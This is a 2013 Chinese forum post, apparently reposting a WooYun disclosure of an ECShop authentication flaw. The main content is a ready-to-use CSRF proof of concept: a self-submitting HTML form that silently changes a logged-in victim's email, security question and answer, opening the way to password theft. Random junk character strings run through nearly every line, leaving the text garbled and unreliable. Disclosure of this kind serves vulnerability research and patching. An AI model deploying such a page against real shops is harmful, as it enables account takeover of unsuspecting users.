找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2399|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:: X, c# @5 J+ n% u( U5 h3 n. L3 `
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
% t" S" \/ e+ l$ i! F8 o6 D
( r: Y) k1 x$ K2 WDemo For:http://www.wooyun.org/bug.php?action=view&id=395( V% m8 L- v. v) x7 U6 z
) u7 C% g4 l) [3 x( C
详细说明:2 w% O" A- H! ~7 N  F+ ~) N! m" p. R
利用csrf和xss可以突破官方所说的“障碍”
, _$ T& S! g' U$ L7 p$ G5 Exss版本已经有人说明- n. J2 }. F" j. n7 i8 P; ]
这里给出csrf版本$ W3 p' h( n0 s+ J3 b; E  d
  [/ }. W% S/ d& q$ n1 X
漏洞证明:
3 d/ `/ s9 Y, T6 `) U<html>
1 J! m* w8 [. n1 s; e/ v<body>
0 P* S' y! d1 B/ V" O<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
3 G; L( q8 \4 g- e<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
2 G3 _- o( v7 l; S<INPUT TYPE="text" NAME="act" value="act_edit_profile">
  t( P& i+ b6 S6 ^+ j<INPUT TYPE="text" NAME="sel_question" value="ecshop">
6 `& E' q% |! I1 p0 P<INPUT TYPE="text" NAME="passwd_answer" value="exploit">  W+ ]: t. r; e7 k/ Y5 J
</body>+ R' Q/ A1 v5 e% E
<script>
) D3 t% y% v0 r/ a7 W/ U8 edocument.forms[0].submit();
$ P$ N8 @6 g( N; M3 Q, M( I4 Z</script>& m0 e7 i0 x& D( Y+ Z
</html>
6 b( U9 b% t% F8 d  f/ I构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失, p8 k- S5 Y& R: h

) _/ ^, e4 @% Z4 Z. ^/ G' I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表